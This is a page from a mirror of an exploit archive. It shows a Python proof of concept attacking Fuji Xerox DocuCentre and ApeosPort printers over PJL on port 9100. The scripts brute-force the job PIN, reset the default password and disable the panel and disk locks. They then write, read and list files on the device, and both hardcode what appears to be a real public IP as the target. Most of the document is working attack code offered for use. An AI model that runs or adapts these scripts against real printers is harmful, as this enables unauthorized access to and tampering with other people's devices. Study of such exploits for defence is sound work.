bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/remote/45332.py
Offensive Security 32f471140a DB: 2018-09-06 
18 changes to exploits/shellcodes

Microsoft people 10.1807.2131.0 - Denial of service (PoC)

GNU glibc < 2.27 - Local Buffer Overflow

UltraISO 9.7.1.3519 - Buffer Overflow (SEH)

JBoss 4.2.x/4.3.x - Information Disclosure

Git < 2.17.1 - Remote Code Execution

FUJI XEROX DocuCentre-V 3065 Printer - Remote Command Execution

FTPShell Server 6.80 - 'Add Account Name' Buffer Overflow (SEH)

Monstra CMS 3.0.4 - Remote Code Execution

OpenDaylight - SQL Injection
Tenda ADSL Router D152 - Cross-Site Scripting

Pivotal Spring Java Framework < 5.0 - Remote Code Execution
2018-09-06 05:01:55 +00:00

94 lines
No EOL
3.1 KiB
Python
Executable file
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: FUJI XEROX DocuCentre-V 3065 Printer - Remote Command Execution
# Date: 2018-09-05
# Exploit Author: vr_system
# Vendor Homepage: https://www.fujixerox.com.cn/
# Software Link: https://www.fujixerox.com.cn/
# Version: DocuCentre-IV,DocuCentre-VI,DocuCentre-V,ApeosPort-VI,ApeosPort-V
# Tested on: DocuCentre-V 3065,ApeosPort-VI C3371,ApeosPort-V C4475,ApeosPort-V C3375,DocuCentre-VI C2271,ApeosPort-V C5576,DocuCentre-IV C2263,DocuCentre-V C2263,ApeosPort-V 5070
# CVE : N/A
# POCAbility to write files to the printer
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import socket
import time
PJL_START = "\033%-12345X@PJL "
PJL_FINISH = "\033%-12345X\r\n"
def Buildsocket(ip,port=9100):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
sock.settimeout(5)
try:
sock.connect((ip, port))
except:
print "[!*]-ip-%s-can't connect--" % ip
return 'error'
for i in range(500):
print"bypass pin:{0}".format(i)
PJL_INFO_ID = """JOB PASSWORD={0}\r\n""".format(i)
DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH
sock.send(DEVICEID)
PJL_INFO_ID = """DEFAULT PASSWORD=0\r\n"""
DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH
sock.send(DEVICEID)
PJL_INFO_ID = """DEFAULT CPLOCK=OFF\r\n"""
DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH
sock.send(DEVICEID)
PJL_INFO_ID = """DEFAULT DISKLOCK=OFF\r\n"""
DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH
sock.send(DEVICEID)
PJL_INFO_ID = """FSDOWNLOAD FORMAT:BINARY SIZE=4 NAME="0:/test4"\r\n"""
DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH
sock.send(DEVICEID)
try:
device = sock.recv(1024)
except:pass
PJL_INFO_ID = """FSUPLOAD NAME="0:/test4" OFFSET=0 SIZE=4\r\n"""
DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH
sock.send(DEVICEID)
try:
device = sock.recv(1024)
except:pass
finally:
sock.close()
print "OK"
if __name__ == '__main__':
ip = "118.42.125.192"
Buildsocket(ip, port=9100)
# POCAbility to view files in the printer
##!/usr/bin/env python
# -*- coding: UTF-8 -*-
import socket
PJL_START = "\033%-12345X@PJL "
PJL_FINISH = "\033%-12345X\r\n"
def Buildsocket(ip, port=9100):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
sock.settimeout(5)
try:
sock.connect((ip, port))
except:
print "[!*]-ip-%s-can't connect--" % ip
return 'error'
PJL_INFO_ID = """FSDIRLIST NAME="0:/" ENTRY=1 COUNT=65535"""
DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH
sock.send(DEVICEID)
try:
device = sock.recv(1024)
except:pass
PJL_INFO_ID = """FSDIRLIST NAME="0:/" ENTRY=1"""
DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH
sock.send(DEVICEID) #
try:
device = sock.recv(1024)
except:
return 'No'
print "[!*]-ip-%s-is-ok\r\ndeviceidis-%s" % (str(ip), device)
sock.close()
return 'OK'
if __name__ == '__main__':
Buildsocket("118.42.125.192", port=9100)
Reference in a new issue View git blame Copy permalink